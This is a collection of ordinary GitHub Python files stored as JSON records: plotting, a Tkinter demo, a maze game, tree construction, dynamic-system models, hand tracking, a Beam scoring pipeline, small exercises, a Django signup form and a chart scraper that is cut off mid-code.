settings\n    plt.title(\"Complexity of matrix multiplication algorithms\")\n    plt.xlabel(\"Size\")\n    plt.ylabel(\"Time, s\")\n    plt.grid()\n\n    # Collecting values\n    for mul_func in mul_funcs:\n        times = benchmark(mul_func, sizes)\n        mul_name = str(mul_func).split()[1]\n        if mul_name == \"defaultMatrixMul\":\n            mul_name = \"Simple\"\n        elif mul_name == \"vinMatrixMul\":\n            mul_name = \"Winograd\"\n        elif mul_name == \"optimizedVinMatrixMul\":\n            mul_name = \"Winograd with optimizations\"\n        plt.plot(sizes, times, label=mul_name)\n\n    # Image of the results obtained\n    plt.legend()\n    plt.show()","repo_name":"Untouchabl3Pineapple/iu7-aa","sub_path":"lab_02/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"73023939244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom Tkinter import * # import the Tkinter library\n\ndef donothing():\n    print('IT WORKED')\n\nroot = Tk() # create the root application\nroot.title(string=\"..:: CALCULADORA ::..\")\n\nframe1 = Frame(root)\n#frame1.pack(side=TOP, fill=X)\nframe1.grid()\n\nframe2 = Frame(root)\n#frame2.pack(side=RIGHT, fill=X)\nframe2.grid()\nmainmenu = Menu(frame1)\nroot.config(menu=mainmenu)\n\nsubmenu=Menu(mainmenu)\nmainmenu.add_cascade(label='File',menu=submenu)\nsubmenu.add_command(label='Open', command=donothing)\nsubmenu.add_separator()\nsubmenu.add_command(label='Exit', command=frame1.quit)\n\n\nw = Label(frame1, text=\"Teste TKinter!\") # create a label with the given text\n#w.pack()\nw.grid(column=0,row=0) # place it on the screen\nbtn = Button(frame1, text=\"Olá\", cursor=\"hand2\")\n#btn.pack()\nbtn.grid(column=0,row=1)\nbtn2 = Button(frame2, text=\"Hello\", cursor=\"umbrella\")\n#btn2.pack()\nbtn2.grid(column=0,row=0)\nbtn3 = Button(frame2, text=\"Hallo\", cursor=\"sailboat\")\n#btn3.pack()\nbtn3.grid(column=1,row=0)\n#from Tkinter import ttk\n#ttk.Button(root, text=\"Hello World\").grid() # create a button\nroot.mainloop() # start the main loop","repo_name":"brunocozendey/100DaysChallenge","sub_path":"python/tkinter-teste.py","file_name":"tkinter-teste.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37196489068","text":"#! 
/usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\"This script starts the MacGyver labyrinth.\r\nParameter:\r\n file_name (describing the map).\"\"\"\r\nfrom core.gamemanager import DisplayManager\r\nfrom core.mapgame import MapGame\r\nfrom core import utils\r\nfrom core import constant\r\nfrom tkinter import messagebox, Tk\r\nimport logging as lg\r\n\r\nlogger = lg.getLogger(__name__)\r\n\r\nMODULE_DAL_PATH = 'core/dal'\r\n\r\n\r\ndef main():\r\n    \"\"\"Main entry, no parameter.\"\"\"\r\n    args = utils.parse_arguments()\r\n    # set up logging\r\n    utils.set_logger()\r\n    # read the map file\r\n    map_game = MapGame(args.datafile)\r\n    lg.info('Map description loaded: %s', map_game.path_name)\r\n    interface_type = args.interface\r\n    lg.info('Display interface : %s', args.interface)\r\n\r\n    # choose the Text or Graphic implementation\r\n    display = utils.build_display(MODULE_DAL_PATH, interface_type)\r\n\r\n    # get the Pygame window\r\n    fenetre = display.init(map_game)\r\n    lg.info('%s env set : %s', args.interface, map_game.path_name)\r\n\r\n    # set up the display manager: initialize items and characters\r\n    game_manager = DisplayManager(display, fenetre, map_game)\r\n\r\n    # place items and characters (MacGyver, guard, needle, ether, tube)\r\n    game_manager.dispatch_items()\r\n    lg.info('Dispatch items set')\r\n\r\n    # main loop\r\n    continuer = 1\r\n\r\n    while continuer:\r\n\r\n        game_manager.draw()\r\n\r\n        for event in display.event_get():\r\n            # event loop\r\n            if event is None:\r\n                continue\r\n\r\n            if display.event_quit(event) is True:\r\n                continuer = 0\r\n            elif display.event_keydown_escape(event) is True:\r\n                continuer = 0\r\n            elif display.event_keydown_right(event) is True:\r\n                game_manager.move_items(constant.ID_MCGYVER, 'droite')\r\n            elif display.event_keydown_left(event) is True:\r\n                game_manager.move_items(constant.ID_MCGYVER, 'gauche')\r\n            elif display.event_keydown_up(event) is True:\r\n                game_manager.move_items(constant.ID_MCGYVER, 'haut')\r\n            elif display.event_keydown_down(event) is True:\r\n                game_manager.move_items(constant.ID_MCGYVER, 'bas')\r\n\r\n        # check items\r\n        if game_manager.compare_pos(constant.ID_MCGYVER,\r\n                                    constant.ID_GARDIEN):\r\n            lg.info('Guard encountered')\r\n            if game_manager.is_completed():\r\n                game_manager.exclude_item(constant.ID_GARDIEN, 4)\r\n                lg.info('Guard put to sleep')\r\n            else:\r\n                lg.info('You lose!')\r\n                Tk().wm_withdraw()\r\n                messagebox.showinfo('Oops', 'You lose!')\r\n                continuer = 0\r\n\r\n        elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n                                      constant.ID_AIGUILLE):\r\n            lg.info('Needle found')\r\n            game_manager.collect_item(constant.ID_AIGUILLE)\r\n            game_manager.exclude_item(constant.ID_AIGUILLE, 0)\r\n\r\n        elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n                                      constant.ID_ETHER):\r\n            lg.info('Ether bottle found')\r\n            game_manager.collect_item(constant.ID_ETHER)\r\n            game_manager.exclude_item(constant.ID_ETHER, 1)\r\n\r\n        elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n                                      constant.ID_TUBE):\r\n            lg.info('Tube found')\r\n            game_manager.collect_item(constant.ID_TUBE)\r\n            game_manager.exclude_item(constant.ID_TUBE, 2)\r\n\r\n        elif game_manager.is_exit(constant.ID_MCGYVER):\r\n            if game_manager.is_completed():\r\n                lg.info('You win!')\r\n                # redraw the game window one last time\r\n                game_manager.draw()\r\n                Tk().wm_withdraw()\r\n                messagebox.showinfo('Congratulations', 'You win!')\r\n                continuer = 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    
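# entry point: parse the CLI arguments, load the map, build the chosen display\r\n    # backend, and run the blocking event loop implemented in main() above\r\n    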
main()\r\n","repo_name":"jean-charles-gibier/macgyver","sub_path":"macgyver.py","file_name":"macgyver.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38003879286","text":"# python 3\nfrom trees.tree_basics import Node\n\n\ndef build_tree(inorder, postorder, n):\n if not inorder:\n return\n\n root = Node(postorder[-1])\n index = inorder.index(root.data)\n\n new_inorder_left = inorder[:index]\n new_inorder_right = inorder[index + 1:]\n\n new_postorder_left = postorder[:index]\n new_postorder_right = postorder[index:len(postorder) - 1]\n\n root.left = build_tree(new_inorder_left, new_postorder_left, n)\n root.right = build_tree(new_inorder_right, new_postorder_right, n)\n\n return root\n\n\ndef main():\n inorder = [4, 8, 2, 5, 1, 6, 3, 7]\n postorder = [8, 4, 5, 2, 6, 7, 3, 1]\n build_tree(inorder, postorder, len(postorder))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HJ1X/dsa-450","sub_path":"trees/Construct tree/construct_tree_from_in_and_post_order.py","file_name":"construct_tree_from_in_and_post_order.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25958911853","text":"\"\"\"Test HTTP capabilities of the core's frontend.\"\"\"\n\nfrom ppp_libmodule.tests import PPPTestCase\nfrom ppp_core import app\n\nclass HttpTest(PPPTestCase(app)):\n config_var = 'PPP_CORE_CONFIG'\n config = \"\"\"\n {\n \"debug\": true,\n \"modules\": []\n }\n \"\"\"\n def testPostOnly(self):\n self.assertEqual(self.app.get('/', status='*').status_int, 405)\n self.assertEqual(self.app.put('/', status='*').status_int, 405)\n def testNotRoot(self):\n self.assertEqual(self.app.post_json('/foo', {}, status='*').status_int, 400)\n def testNotJson(self):\n self.assertEqual(self.app.post('/', 'foobar', status='*').status_int, 400)\n def testWorking(self):\n q = {'id': '1', 'language': 'en', 'tree': {'type': 'triple',\n 'subject': {'type': 'resource', 'value': 'foo'},\n 'predicate': {'type': 'resource', 'value': 'bar'},\n 'object': {'type': 'resource', 'value': 'baz'}},\n 'measures': {}, 'trace': []}\n self.assertResponse(q, [])\n def testNoTree(self):\n q = {'language': 'en'}\n self.assertStatusInt(q, 400)\n","repo_name":"ProjetPP/PPP-Core","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"673259033","text":"\"\"\"Example dynamic models.\"\"\"\n\nimport abc\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import constants, integrate\n\n\nclass ContinuousDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Continuous-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement differential equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Time derivative of state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t: float, x: np.ndarray) -> np.ndarray:\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: 
Callable[[float], np.ndarray],\n **kwargs,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model using numerical integration.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : Callable[[float], np.ndarray]\n Input function of time.\n **kwargs : dict\n Keyword arguments for :func:`integrate.solve_ivp`.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n sol = integrate.solve_ivp(\n lambda t, x: self.f(t, x, u(t)),\n t_range,\n x0,\n t_eval=np.arange(*t_range, t_step),\n **kwargs,\n )\n return (sol.t, sol.y.T)\n\n\nclass DiscreteDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Discrete-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement next-state equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Next state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t, x):\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: np.ndarray,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : np.ndarray\n Input array.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. 
Each timestep is one row.\n \"\"\"\n t = np.arange(*t_range, t_step)\n x = np.empty((t.shape[0], x0.shape[0]))\n x[0, :] = x0\n for k in range(1, t.shape[0]):\n x[k, :] = self.f(t[k - 1], x[k - 1, :], u[k - 1])\n return (t, x)\n\n\nclass MassSpringDamper(ContinuousDynamicModel):\n \"\"\"Mass-spring-damper model.\n\n State is ``[position, velocity]``.\n\n Examples\n --------\n Simulate a mass-spring-damper\n\n >>> msd = pykoop.dynamic_models.MassSpringDamper(0.5, 0.7, 0.6)\n >>> x0 = np.array([1, 0])\n >>> t, x = msd.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass: float, stiffness: float, damping: float) -> None:\n \"\"\"Instantiate :class:`MassSpringDamper`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n stiffness : float\n Stiffness (N/m).\n damping : float\n Viscous damping (N.s/m).\n \"\"\"\n self.mass = mass\n self.stiffness = stiffness\n self.damping = damping\n\n @property\n def A(self):\n \"\"\"Compute ``A`` matrix.\"\"\"\n A = np.array([\n [0, 1],\n [-self.stiffness / self.mass, -self.damping / self.mass],\n ])\n return A\n\n @property\n def B(self):\n \"\"\"Compute ``B`` matrix.\"\"\"\n B = np.array([\n [0],\n [1 / self.mass],\n ])\n return B\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = (self.A @ np.reshape(x, (-1, 1))\n + self.B @ np.reshape(u, (-1, 1)))\n return np.ravel(x_dot)\n\n\nclass Pendulum(ContinuousDynamicModel):\n \"\"\"Point-mass pendulum with optional damping.\n\n State is ``[angle, angular_velocity]``.\n\n Examples\n --------\n Simulate a pendulum\n\n >>> pend = pykoop.dynamic_models.Pendulum(0.5, 1, 0.6)\n >>> x0 = np.array([np.pi / 2, 0])\n >>> t, x = pend.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass, length, damping=0):\n \"\"\"Instantiate :class:`Pendulum`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n length : float\n Length (m).\n damping : float\n Viscous damping (N.m.s/rad).\n \"\"\"\n self.mass = mass\n self.length = length\n self.damping = damping\n\n def f(self, t, x, u):\n # noqa: D102\n theta, theta_dot = x\n x_dot = np.array([\n theta_dot,\n (-self.damping / self.mass / self.length**2 * theta_dot\n - constants.g / self.length * np.sin(theta)),\n ]) + np.array([\n 0,\n 1 / (self.mass * self.length**2),\n ]) * u\n return x_dot\n\n\nclass DuffingOscillator(ContinuousDynamicModel):\n r\"\"\"Duffing oscillator model.\n\n Equation is ``\\ddot{x} + \\delta \\dot{x} + \\beta x + \\alpha x^3 = u(t)``\n where usually ``u(t) = a \\cos(\\omega t)``.\n \"\"\"\n\n def __init__(\n self,\n alpha: float = 1,\n beta: float = -1,\n delta: float = 0.1,\n ) -> None:\n \"\"\"Instantiate :class:`DuffingOscillator`.\n\n Parameters\n ----------\n alpha : float\n Coefficient of cubic term.\n beta : float\n Coefficient of linear term.\n delta : float\n Coefficient of first derivative.\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.delta = delta\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = np.array([\n x[1],\n u - self.delta * x[1] - self.beta * x[0] - self.alpha * x[0]**3\n ])\n return x_dot\n\n\nclass DiscreteVanDerPol(DiscreteDynamicModel):\n \"\"\"Van der Pol oscillator.\n\n Examples\n --------\n Simulate Van der Pol oscillator\n\n >>> t_step = 0.1\n >>> vdp = pykoop.dynamic_models.DiscreteVanDerPol(t_step, 2)\n >>> x0 = np.array([1, 0])\n >>> t_range = (0, 10)\n >>> u = 0.01 * np.cos(np.arange(*t_range, t_step))\n >>> t, x = vdp.simulate(t_range, t_step, x0, u)\n \"\"\"\n\n def __init__(self, t_step: float, 
mu: float) -> None:\n \"\"\"Instantiate :class:`DiscreteVanDerPol`.\n\n Parameters\n ----------\n t_step : float\n Timestep (s)\n mu : float\n Strength of nonlinearity.\n \"\"\"\n self.t_step = t_step\n self.mu = mu\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n # noqa: D102\n x_next = x + self.t_step * np.array(\n [x[1], self.mu * (1 - x[0]**2) * x[1] - x[0] + u])\n return x_next\n","repo_name":"decargroup/pykoop","sub_path":"pykoop/dynamic_models.py","file_name":"dynamic_models.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"3890310635","text":"import cv2\nimport mediapipe as mp\n\nmp_hand = mp.solutions.hands\nhands = mp_hand.Hands()\nmp_drawing_utils = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n if not success:\n break\n result = hands.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n if result.multi_hand_landmarks:\n for hand_landmark in result.multi_hand_landmarks:\n mp_drawing_utils.draw_landmarks(\n img,\n hand_landmark,\n mp_hand.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()\n )\n for id_landmark, landmark in enumerate(hand_landmark.landmark):\n print(id_landmark, landmark)\n if id_landmark == 0:\n h, w, c = img.shape\n print(h, w)\n cx_0, cy_0 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 1:\n h, w, c = img.shape\n cx_1, cy_1 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 9:\n h, w, c = img.shape\n cx_9, cy_9 = int(landmark.x * w), int(landmark.y * h)\n elif id_landmark == 17:\n h, w, c = img.shape\n cx_17, cy_17 = int(landmark.x * w), int(landmark.y * h)\n\n cv2.line(img, (cx_0, cy_0), (cx_9, cy_9), (255, 0, 0), 5)\n cv2.line(img, (cx_1, cy_1), (cx_17, cy_17), (255, 0, 0), 5)\n\n\n\n # print(result.multi_hand_landmarks)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jsli96/ramp1.4_mega2560","sub_path":"haptic-device_mega2560/hand_rec_cv.py","file_name":"hand_rec_cv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"86748210456","text":"import apache_beam as beam\nfrom apache_beam.options.pipeline_options import (PipelineOptions, SetupOptions) \nimport argparse\n\nOUTPUT_SCHEMA = \"bestdeviceid:STRING, bestdeviceidtype:STRING, offerlevel:INTEGER, score:FLOAT, timestamp:TIMESTAMP\" \n\nOFFERLEVELS = [645570,640602,652131,640737,643902,649216,31454,633602,622270,636785]\n\ndef map_to_dict(x):\n \"\"\n return {\n 'bestdeviceid':x['bestdeviceid'], \n 'bestdeviceidtype':x['bestdeviceidtype'],\n 'offerlevel': x['offerlevel'],\n 'score':x['score'],\n 'timestamp':x['timestamp']}\n\n\nclass ModelInference(beam.DoFn):\n\n def __init__(self, offerlevel_id):\n \n import datetime\n from google.cloud import storage\n import joblib\n \n self._dt = datetime\n \n self._offerlevel = offerlevel_id\n self._bucket = 'pjm-sklearn-models'\n self._filename = f\"ol{offerlevel_id}.joblib\"\n \n _bucket = storage.Client().get_bucket(self._bucket)\n _blob = _bucket.blob(self._filename)\n \n # download to local\n _blob.download_to_filename(self._filename)\n self.model = joblib.load(self._filename)\n\n\n def process(self, element):\n \n pred = self.model.predict_proba([element['visitdata']])[:,1]\n 
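        # editor's note: assuming a scikit-learn-style classifier here, predict_proba\n        # returns an (n_samples, n_classes) array, so [:, 1] selects the probability\n        # of the positive class for this single visit row\n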
\n return [{\n 'bestdeviceid':element['bestdeviceid'],\n 'bestdeviceidtype':element['bestdeviceidtype'],\n 'offerlevel':int(self._offerlevel),\n 'score':pred[0],\n 'timestamp':self._dt.datetime.now().isoformat()\n }]\n\n\ndef run(argv=None, save_main_session=True):\n\n parser = argparse.ArgumentParser()\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n with beam.Pipeline(options=pipeline_options) as p:\n source_data = (p \n | 'QueryTable' >> beam.io.Read(\n beam.io.BigQuerySource(\n query=\"\"\"\n select *\n from [dst-mlpipes:pjm_visitdata_sample.universe]\n limit 1000000\n \"\"\")\n )\n )\n\n inferences = []\n for offerlevel in OFFERLEVELS:\n inferences.append(source_data \n | f'Perform Inference OL {offerlevel}' >> beam.ParDo(ModelInference(offerlevel)))\n\n outputs = (\n tuple(inferences)\n | 'Combine outputs' >> beam.Flatten()\n # | 'Map to necessary structure' >> beam.Map(map_to_dict)\n | 'Write' >> beam.io.WriteToBigQuery(\n table='scoring_output',\n dataset='pjm_visitdata_sample',\n project='dst-mlpipes',\n schema=OUTPUT_SCHEMA)\n )\n\nif __name__ == '__main__':\n run()","repo_name":"pmccarthy-dstillery/tfxtesting","sub_path":"dataflow_scoring/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2256081934","text":"import numpy as np\r\n\r\ndef global_connectivity(nb_neurons,probability):\r\n all_neurons_id = np.arange(0,nb_neurons)\r\n all_i = np.repeat(all_neurons_id,nb_neurons)\r\n all_j = np.tile(all_neurons_id,nb_neurons)\r\n chozen_connections = np.random.choice(np.arange(0,nb_neurons**2),int((nb_neurons**2)*probability),replace=False)\r\n i_connect = all_i[chozen_connections]\r\n j_connect = all_j[chozen_connections]\r\n return i_connect,j_connect\r\n\r\ndef strength_assembly(neuron_pool,i_connect,j_connect,prev_strengths,inside_strength):\r\n\r\n new_strengths = prev_strengths\r\n\r\n for i_id in range(len(i_connect)):\r\n i= i_connect[i_id]\r\n j=j_connect[i_id]\r\n if i in neuron_pool and j in neuron_pool:\r\n new_strengths[i_id] = inside_strength\r\n\r\n return new_strengths","repo_name":"Saighi/SelfHealingNetwork","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71703622763","text":"import torch\nimport torch.nn as nn\n\n\nclass CE:\n def __init__(self, model):\n self.model = model\n self.ce = nn.CrossEntropyLoss()\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n labels = labels.view(-1).long()\n loss = self.ce(outputs, labels)\n return loss\n\n\nclass BCE:\n def __init__(self, model):\n self.model = model\n self.bce = nn.BCELoss(reduction='none')\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n weight = torch.ones(outputs.shape[0]).float().to(outputs.device)\n loss = self.bce(outputs.view(-1), labels.float())\n loss = torch.mean(weight * loss)\n return loss\n","repo_name":"icantnamemyself/FormerTime","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"73950601002","text":"#coding=utf-8\n__author__ = 'xuxuan'\nclass 
Solution(object):\n _numsToRoman=[\n ['','I','II','III','IV','V','VI','VII','VIII','IX','X'],\n ['','X','XX','XXX','XL','L','LX','LXX','LXXX','XC','C'],\n ['','C','CC','CCC','CD','D','DC','DCC','DCCC','CM','M'],\n ['','M','MM','MMM'],\n ]\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n s='0'*(4-len(str(num)))+str(num)\n ntr=self._numsToRoman\n return ntr[3][int(s[0])]+ntr[2][int(s[1])]+ntr[1][int(s[2])]+ntr[0][int(s[3])]","repo_name":"corpsepiges/leetcode","sub_path":"python/012. Integer to Roman.py","file_name":"012. Integer to Roman.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"19"} +{"seq_id":"37336729604","text":"# ================= Atmospheric CO2 Emissions ===================\r\n\r\n#This program is to show the growth of CO2 Emissions since 1960, when the Mauna Loa records began being published.\r\n#The data has been retrieved and copied from the following website: https://climate.nasa.gov/vital-signs/carbon-dioxide/\r\n# where the data can be downloaded and viewed.\r\n#The objective of this is to show how polynomial regression can look in relation to linear regression.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n# Training set\r\nx_line = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year.\r\ny_line = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Testing set\r\nx_poly = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year\r\ny_poly = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Train the Linear Regression model and plot a prediction\r\nregressor = LinearRegression()\r\nregressor.fit(x_line, y_line)\r\nxx = np.linspace(1950, 2020, 10)\r\nyy = regressor.predict(xx.reshape(xx.shape[0], 1))\r\nplt.plot(xx, yy)\r\n\r\n# Set the degree of the Polynomial Regression model\r\nquadratic_degree = PolynomialFeatures(degree=2)\r\n\r\n# This preprocessor transforms an input data matrix into a new data matrix of a given degree\r\nx_train_quadratic = quadratic_degree.fit_transform(x_line)\r\nx_test_quadratic = quadratic_degree.transform(x_poly)\r\n\r\n# Train and test the regressor_quadratic model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_line)\r\nxx_quadratic = quadratic_degree.transform(xx.reshape(xx.shape[0], 1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Atmospheric Carbon Dioxide Emissions Over 60 Years')\r\nplt.xlabel('Year')\r\nplt.ylabel('CO2 Emissions in Parts Per Million(PPM)')\r\nplt.axis([1950, 2020, 310, 420])\r\nplt.grid(True)\r\nplt.scatter(x_line, y_line)\r\nplt.show()\r\nprint(x_line)\r\nprint(x_train_quadratic)\r\nprint(x_poly)\r\nprint(x_test_quadratic)\r\n\r\n# If you execute the code, you will see that the simple linear regression model is plotted with\r\n# a solid line. 
The quadratic regression model is plotted with a dashed line, and it evidently\r\n# fits the training data slightly better.\r\n","repo_name":"Bmk19/Atmospheric_CO2Emissions","sub_path":"AtmosphericCO2.py","file_name":"AtmosphericCO2.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71476930922","text":"# Chapter 7, programming exercise 3\n# This program calculates the corresponding\n# grade of an exam score.\n\ndef main():\n    print(\"This program will calculate the corresponding grade of an exam score.\\n\")\n    try:\n        examScore = int(input(\"Enter your exam score: \"))\n    except (NameError, TypeError, ValueError):\n        print(\"Please enter a valid number between 0 and 100.\")\n        # bail out: examScore is unbound after invalid input\n        return\n\n    if 100 >= examScore >= 90:\n        grade = \"A\"\n    elif 90 > examScore >= 80:\n        grade = \"B\"\n    elif 80 > examScore >= 70:\n        grade = \"C\"\n    elif 70 > examScore >= 60:\n        grade = \"D\"\n    elif 60 > examScore >= 0:\n        grade = \"F\"\n    else:\n        print(\"Please enter a valid number between 0 and 100.\")\n        return\n\n    print(\"The corresponding grade of your exam score is\", grade, \".\")\n\nif __name__ == '__main__':\n    main()","repo_name":"dashaevsina/HW070172","sub_path":"L05/Chapter 7 Programming exercise 3).py","file_name":"Chapter 7 Programming exercise 3).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2464169476","text":"from django.contrib.auth.forms import UserCreationForm\n\nfrom django.db import transaction\nfrom django import forms\nfrom .models import User,ReaderProfile,AuthorProfile\nchoices = ((\"READER\",\"Reader\"),(\"AUTHOR\",\"Author\"))\nclass SignupForm(UserCreationForm):\n    role = forms.ChoiceField(choices=choices)\n    class Meta(UserCreationForm.Meta):\n        model = User\n        fields = [\"username\",\"email\",\"role\"]\n    \n    @transaction.atomic\n    def save(self):\n        user = super().save(commit=False)\n        user.role = self.cleaned_data.get('role')\n        # if(\"READER\" in self.cleaned_data.get('role')):\n        #     user.role = (\"READER\",'Reader')\n        # else:\n        #     user.role = (\"AUTHOR\",'Author')\n        user.save()\n        if(user.role == \"READER\"):\n            reader = ReaderProfile.objects.create(user=user)\n            reader.save()\n        \n        elif(user.role == \"AUTHOR\"):\n            author = AuthorProfile.objects.create(user=user)\n            author.save()\n        return user\n","repo_name":"adel5555/libsys","sub_path":"user/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3771861795","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef melon():\n    url = 'https://www.melon.com/chart/'\n    header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'}\n    result = requests.get(url, headers=header)\n    soup = BeautifulSoup(result.text, 'html.parser')\n    trs = soup.select('#lst50')\n    line = []\n    for tr in trs:\n        rank = tr.select_one('.wrap.t_center').get_text().split('\\n')\n        img = 'https:' + tr.select_one('td > div > a> img')['src']\n        title = tr.select_one('.ellipsis.rank01>span>a').get_text().split('\\n')\n        artist = tr.select_one('.ellipsis.rank02>span>a').get_text()\n        song = tr.select_one('.ellipsis.rank03>a').get_text().split('\\n')\n        
